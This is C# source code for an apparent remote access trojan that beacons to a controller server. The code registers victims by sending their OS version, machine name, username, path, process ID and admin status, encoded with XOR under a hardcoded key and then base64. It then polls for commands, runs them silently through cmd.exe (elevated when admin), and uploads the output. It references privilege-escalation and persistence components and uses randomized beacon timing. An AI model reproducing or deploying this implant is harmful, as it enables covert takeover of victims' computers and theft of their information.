/*
* <explanation>
* Send result of command to speficied uri as rspns.
* </explanation>
*/
public void _sendResult(String result, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
{
string asd = chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));
string myParameters = "sid=" + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar")) + "&rspns=" + chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));
web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
try
{
string sendResult = web.UploadString(Globals.resultSendUri, myParameters);
}
catch
{
while (true)
{
if (errorCounter > 19)
{
break;
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
try
{
_sendResult(result, web, enumEnv, chipops);
break;
}
catch
{
errorCounter++;
}
}
errorCounter = 0;
}
}
/*
* <explanation>
* First stage of registration process.
* In this stage, client sends a GET request to login.php.
* If "OK" returns by server second stage of registration process will start.
* </explanation>
*/
private void _registerFirstStage(initialEnum enumed)
{
if (errorCounter < 20)
{
_setID(ref enumed);
string sid = chiperObj._base64encode(chiperObj._xorOps(enumed.clientID, "northstar"));
web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
try
{
string myParameters = "sid=" + sid;
string stat = web.UploadString(Globals.registerFirstStageUri, myParameters);
enumed.xorKey = chiperObj._xorOps(chiperObj._base64decode(stat), Globals.tempKey);
errorCounter = 0;
_registerSecondStage(ref enumed);
}
catch
{
errorCounter += 1;
System.Threading.Thread.Sleep(5000);
_registerFirstStage(enumed);
}
}
else
{
isComplete = false;
}
}
/*
* <explanation>
* Send GET request to speficied uri and return response as command.
* </explanation>
*/
public string _getCommand(String uri, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
{
try
{
comm = web.DownloadString(uri);
string clearedComm = Regex.Replace(comm, @"^\s+$[\r\n]*", string.Empty, RegexOptions.Multiline);
string decodedComm = chipops._xorOps(chipops._base64decode(clearedComm), enumEnv.xorKey);
return(decodedComm);
}
catch
{
while (true)
{
if (errorCounter > 19)
{
break;
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
try
{
comm = web.DownloadString(uri);
string clearCommand = chipops._xorOps(chipops._base64decode(comm), enumEnv.xorKey);
return(clearCommand);
}
catch
{
errorCounter++;
}
}
errorCounter = 0;
return("");
}
}
public registerIn(initialEnum enumed, Chiper chipops, System.Net.WebClient webObj)
{
chiperObj = chipops;
web = webObj;
if (clientId == null && isComplete == false)
{
_registerFirstStage(enumed);
}
}
/*
* <explanation>
* Creates 18 characters long Uniq client-id.
* This ID will be used in any request will be sended to controller server.
* For extra security layer prepend character 'N' and append character 'q' are exists.
* Those characters and length of ID will be checked by server to determine wether is valid client or not.
* </explanation>
*/
private void _setID(ref initialEnum enumed)
{
Random random = new Random();
string characters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
StringBuilder result = new StringBuilder(16);
for (int i = 0; i <= 16; i++)
{
result.Append(characters[random.Next(characters.Length)]);
}
clientId = "N" + result.ToString() + "q";
enumed.clientID = clientId;
}
/*
* <explanation>
* Second stage of registration process.
* In this stage; operating system, machine name, username, working directory, process id and current privileges are send to server
* via POST request in base64 format. And if server returns "OK" as response, registration process will be marked as completed.
* Otherwise, function waits for 5 seconds and tries to send POST request again.
* <variable>isCompleted</variable> will be used for checking if registration process is completed.
* </explanation>
*/
private void _registerSecondStage(ref initialEnum enumed)
{
if (errorCounter < 20)
{
OperatingSystem os_info = System.Environment.OSVersion;
string opsys = chiperObj._base64encode(chiperObj._xorOps(enumed.osVer, enumed.xorKey));
string mName = chiperObj._base64encode(chiperObj._xorOps(enumed.mName, enumed.xorKey));
string sus = chiperObj._base64encode(chiperObj._xorOps(enumed.userName, enumed.xorKey));
string wdir = chiperObj._base64encode(chiperObj._xorOps(enumed.executablePath, enumed.xorKey));
string isadmin = chiperObj._base64encode(chiperObj._xorOps(enumed.isAdmin.ToString(), enumed.xorKey));
string pid = chiperObj._base64encode(chiperObj._xorOps(enumed.processId.ToString(), enumed.xorKey));
string id = chiperObj._base64encode(chiperObj._xorOps(enumed.clientID, "northstar"));
string myParameters = "sid=" + id + "&opsys=" + opsys + "&mName=" + mName + "&sus=" + sus + "&wdir=" + wdir + "&pid=" + pid + "&isadm=" + isadmin;
web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
try
{
string res = web.UploadString(Globals.registerSecondStageUri, myParameters);
if (!res.Contains("NOT FOUND"))
{
isComplete = true;
errorCounter = 0;
}
else
{
errorCounter += 1;
System.Threading.Thread.Sleep(5000);
_registerSecondStage(ref enumed);
}
}
catch
{
errorCounter += 1;
System.Threading.Thread.Sleep(5000);
_registerSecondStage(ref enumed);
}
}
else
{
isComplete = false;
}
}
/*
* <explanation>
* This function is used for retrieving running processes from <method>GetCurrentProcess</method> of <class>Process</class>.
* <namespace>System.Diagnostics</namespace> is required for this task.
* </explanation>
*/
public void _cmdMode(string command, sendRetrieve sendObj, initialEnum enumEnv, System.Net.WebClient web, Chiper chipops, String uri)
{
string result = "";
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c" + command;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.WorkingDirectory = this._workingDir();
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
if (enumEnv.isAdmin)
{
p.StartInfo.Verb = "runas";
}
p.Start();
result += p.StandardOutput.ReadToEnd();
result += p.StandardError.ReadToEnd();
sendObj._sendResult(result, web, enumEnv, chipops);
}
static void Main(string[] args)
{
WebClient web = new WebClient();
web.Proxy = WebRequest.GetSystemWebProxy();
web.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
web.Credentials = CredentialCache.DefaultCredentials;
initialEnum enumEnv = new initialEnum();
privilegeEscalation privs = new privilegeEscalation();
sendRetrieve sendOrRetrieve = new sendRetrieve();
Chiper chipops = new Chiper();
addPersistence persistence = new addPersistence();
processCommand proc = new processCommand(enumEnv, privs, persistence);
registerIn register;
int waitTimeCounter = 0;
register = new registerIn(enumEnv, chipops, web);
if (register.isComplete)
{
// persistence._copyItSelf();
string commandRetrieveUri = Globals.commandRetrieveUri + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar"));
while (true)
{
string comm = sendOrRetrieve._getCommand(commandRetrieveUri, web, enumEnv, chipops);
if (!proc.cmdModeEnabled)
{
try
{
if (comm.Length >= 2)
{
if (comm == "die")
{
break;
}
waitTimeCounter = 0;
string commandResult = proc._parseCommand(comm);
if (!proc.wasScreenshot && commandResult.Length > 1)
{
sendOrRetrieve._sendResult(commandResult, web, enumEnv, chipops);
}
else
{
proc.wasScreenshot = false;
}
}
else if (comm.Length < 2)
{
waitTimeCounter++;
if (waitTimeCounter > 40)
{
enumEnv.isWaitTimeManuallySetted = false;
waitTimeCounter = 0;
}
}
}
catch
{
System.Threading.Thread.Sleep(enumEnv.waitTime);
}
}
else //if cmd mode enabled
{
if (comm.Length > 2)
{
if (comm == "exit" || comm == "break" || comm == "disablecmd")
{
proc.cmdModeEnabled = false;
sendOrRetrieve._sendResult("CMD mode disabled", web, enumEnv, chipops);
}
else
{
if (comm.Contains("wait"))
{
sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
}
else if (comm.Contains("cd ") && !comm.Contains("cd ,"))
{
sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
}
else
{
proc._cmdMode(comm, sendOrRetrieve, enumEnv, web, chipops, commandRetrieveUri);
}
}
}
else
{
waitTimeCounter++;
if (waitTimeCounter > 40)
{
enumEnv.isWaitTimeManuallySetted = false;
waitTimeCounter = 0;
}
}
}
System.Threading.Thread.Sleep(enumEnv.waitTime);
if (!enumEnv.isWaitTimeManuallySetted)
{
enumEnv.setRandomWaitTime();
}
}
}
}
/*
* <explanation>
* Time interval to send GET request to the controller server.
* Specified Get request is used to retrieve commands from server.
* By default time interval is between 8 seconds to 23 seconds but i can be setted to
* fixed interval by setting <variable>waitTime</variable> of <class>initialEnum</class> to a fixed value.
* To control if <variable>waitTime</variable> setted by hand, another variable <variable>isWaitTimeManuallySetted</variable> is used.
* </explanation>
*/
public string _setWaitTime(initialEnum enumenv, string argument)
{
enumenv.waitTime = System.Convert.ToInt32(argument) * 1000;
enumenv.isWaitTimeManuallySetted = true;
return("Wait time is setted to: " + argument + " seconds");
}
public processCommand(initialEnum enumEnv, privilegeEscalation priv, addPersistence persistenceObj)
{
enumObj = enumEnv;
privs = priv;
persObj = persistenceObj;
}